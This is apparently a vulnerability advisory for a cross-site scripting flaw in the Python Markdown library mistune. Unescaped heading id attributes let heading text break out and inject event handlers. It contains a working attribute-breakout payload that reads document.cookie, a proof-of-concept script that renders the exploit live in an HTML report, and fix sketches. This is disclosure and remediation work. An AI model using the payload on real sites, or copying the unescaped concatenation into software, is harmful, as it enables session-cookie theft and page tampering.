PT-2026-39330 · Pypi · Mistune
Published 2026-05-09 · Updated 2026-05-09 · CVE-2026-44897
CVSS v3.1: 6.1 (Medium)
| Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Summary
HTMLRenderer.heading() builds the opening <hN> tag by concatenating the id attribute value directly into the HTML, with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character (") in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.
The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors like #installation or #getting-started, is by far the most common real-world use of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.
Details
File: src/mistune/renderers/html.py
def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    id = attrs.get("id")
    if id:
        html += ' id="' + id + '"'  # ← id is never escaped
    return html + ">" + text + "</" + tag + ">\n"
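The flaw can be reproduced without installing mistune. The sketch below copies the concatenation logic of heading() into a standalone function (heading_like is a hypothetical name) and feeds it the attribute-breaking payload used in the PoC, with the body text pre-escaped the way the inline renderer would deliver it. The returned tag carries onmouseover as a separate attribute.

```python
from typing import Any


def heading_like(text: str, level: int, **attrs: Any) -> str:
    """Standalone copy of the vulnerable concatenation in HTMLRenderer.heading()."""
    tag = "h" + str(level)
    html = "<" + tag
    heading_id = attrs.get("id")
    if heading_id:
        # The id value is spliced in verbatim: a '"' inside it closes the attribute.
        html += ' id="' + heading_id + '"'
    return html + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
# Simplified stand-in for upstream escaping: only '"' needs encoding for this payload.
body = payload.replace('"', "&quot;")
print(heading_like(body, 2, id=payload))
```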
The text body (the heading content) is escaped upstream by the inline renderer, which is why text arrives with its quotes already encoded as &quot;. The id, by contrast, arrives as the raw string returned by the heading_id callback, and no escaping occurs at any point in the pipeline.
PoC
Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:
from mistune import create_markdown
from mistune.toc import add_toc_hook

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)  # default: heading_id produces toc_1, toc_2, …
bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
Output — ID is auto-generated, no user text appears in it:
<h2 id="toc_1">Introduction</h2>
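For comparison, a position-only callback in the style of that default looks roughly like this. It is a sketch with a hypothetical name (default_style_id), not mistune's own source. Because the result depends only on the heading's index, nothing from the heading text can reach the id= attribute.

```python
def default_style_id(token: dict, index: int) -> str:
    """Position-based ID in the style of the default hook: toc_1, toc_2, ..."""
    # The token is ignored entirely, so heading text never influences the ID.
    return "toc_" + str(index + 1)


headings = [{"text": "Introduction"}, {"text": 'foo" onmouseover="alert(1)'}]
print([default_style_id(tok, i) for i, tok in enumerate(headings)])
# → ['toc_1', 'toc_2']
```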
Step 2 — Add the realistic trigger: a text-based heading_id callback
Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, MkDocs, Sphinx and Jekyll all do this). The PoC uses the simplest possible version, returning the raw heading text unchanged, to show the vulnerability without any extra transformation:
def raw_id(token, index):
    return token.get("text", "")  # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
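By contrast, a callback can keep readable anchors without this exposure if it reduces the heading text to a restricted character set before returning it. The sketch below is hypothetical: slug_id is not part of mistune, and its rules are an assumption rather than any particular generator's algorithm. It keeps only lowercase ASCII letters, digits and hyphens, and falls back to a position-based ID when nothing survives.

```python
import re
import unicodedata


def slug_id(token: dict, index: int) -> str:
    """Readable anchor derived from heading text, restricted to [a-z0-9-]."""
    text = token.get("text", "")
    # Fold accented characters to ASCII where possible, then lowercase.
    text = unicodedata.normalize("NFKD", text).encode("ascii", "ignore").decode("ascii").lower()
    # Replace every run of disallowed characters (including '"', '<', '>') with '-'.
    slug = re.sub(r"[^a-z0-9]+", "-", text).strip("-")
    # Fall back to a position-based ID if nothing usable is left.
    return slug or "toc_" + str(index + 1)


print(slug_id({"text": "Getting Started"}, 0))
# → getting-started
```

Such a callback would be registered the same way as raw_id, for example add_toc_hook(md, heading_id=slug_id). Duplicate headings would still produce duplicate slugs; de-duplication is left out to keep the sketch short.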
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.
Step 4 — Observe attribute breakout in the output
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
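To confirm how an HTML parser interprets this output, independently of a browser, the markup can be fed to Python's standard html.parser module. The class and helper names below are hypothetical. The first string is the actual output shown above; the second is the same payload with its quotes entity-encoded inside id=, for contrast.

```python
from html.parser import HTMLParser


class HeadingAttrCollector(HTMLParser):
    """Collects the attribute list of every <h1>-<h6> start tag."""

    HEADINGS = {"h1", "h2", "h3", "h4", "h5", "h6"}

    def __init__(self):
        super().__init__()
        self.found = []  # one list of (name, value) pairs per heading

    def handle_starttag(self, tag, attrs):
        if tag in self.HEADINGS:
            self.found.append(attrs)


def heading_attr_names(markup):
    """Return the attribute names the parser sees on each heading tag."""
    parser = HeadingAttrCollector()
    parser.feed(markup)
    parser.close()
    return [[name for name, _ in attrs] for attrs in parser.found]


actual = ('<h2 id="foo" onmouseover="alert(document.cookie)" x="">'
          'foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>')
escaped = ('<h2 id="foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;">'
           'foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>')

print(heading_attr_names(actual))   # three attributes: the breakout worked
print(heading_attr_names(escaped))  # a single id attribute
```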
Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. When a user moves the mouse over the heading, alert(document.cookie) runs; any JavaScript payload can be substituted.
Script
The following verification script reproduces the issue. It writes the baseline and exploit inputs to Markdown files, prints the rendered HTML, and generates an HTML report that renders both results in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook


def raw_id(token, index):
    # Vulnerable callback: uses the raw heading text as the anchor ID.
    return token.get("text", "")


# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)
bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)
print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)
print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""
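def case(kind, label, filename, src, out):
    # One report card: Markdown input, escaped HTML source, and the live (unescaped) rendering of the output.
    return f"""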
<div class="case {kind}">
<div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
<div class="panels">
<div class="panel">
<h3>Input — {h.escape(filename)}</h3>
<pre>{h.escape(src)}</pre>
</div>
<div class="panel">
<h3>Output — HTML source</h3>
<pre>{h.escape(out)}</pre>
<div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
<div class="rendered">{out}</div>
</div>
</div>
</div>"""
page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + id + '"' with no escaping.
Triggered when the heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""
out_path = os.path.join(os.getcwd(), "report_h2.html")
# UTF-8 matches the page's <meta charset> and its non-ASCII arrows.
with open(out_path, "w", encoding="utf-8") as f:
    f.write(page)
print(f"\n[report] {out_path}")
Example Usage:
python poc.py
Once the script has run, open report_h2.html in a browser and hover over the exploit heading to trigger the injected onmouseover handler.
Impact
| Dimension | Assessment |
|---|---|
| Confidentiality | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| Integrity | DOM manipulation, phishing content injection, forced navigation |
| Availability | Injected script can freeze or crash the page (the CVSS vector above nonetheless rates availability impact as None, A:N) |
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that derives anchors from heading text is vulnerable if its mistune heading_id callback can return a value containing a double quote, that is, if the returned value is not independently sanitised.
Fix
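A minimal sketch of one possible remedy (not necessarily the upstream patch), assuming the fix is simply to HTML-escape the id value, quotes included, before concatenating it. It uses the standard library's html.escape; the library's own escape() helper named in the summary would presumably serve the same purpose inside mistune. The function name heading_escaped is hypothetical.

```python
import html
from typing import Any


def heading_escaped(text: str, level: int, **attrs: Any) -> str:
    """Variant of HTMLRenderer.heading() that escapes the id before use."""
    tag = "h" + str(level)
    out = "<" + tag
    heading_id = attrs.get("id")
    if heading_id:
        # quote=True turns '"' into '&quot;', so the value cannot close id="...".
        out += ' id="' + html.escape(heading_id, quote=True) + '"'
    return out + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
print(heading_escaped("foo", 2, id=payload))
```

Escaping keeps the markup well-formed, but the resulting id still contains spaces and punctuation that make poor fragment identifiers, so applications deriving IDs from heading text may still want a slug-style callback as well.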
XSS
Affected Products
Mistune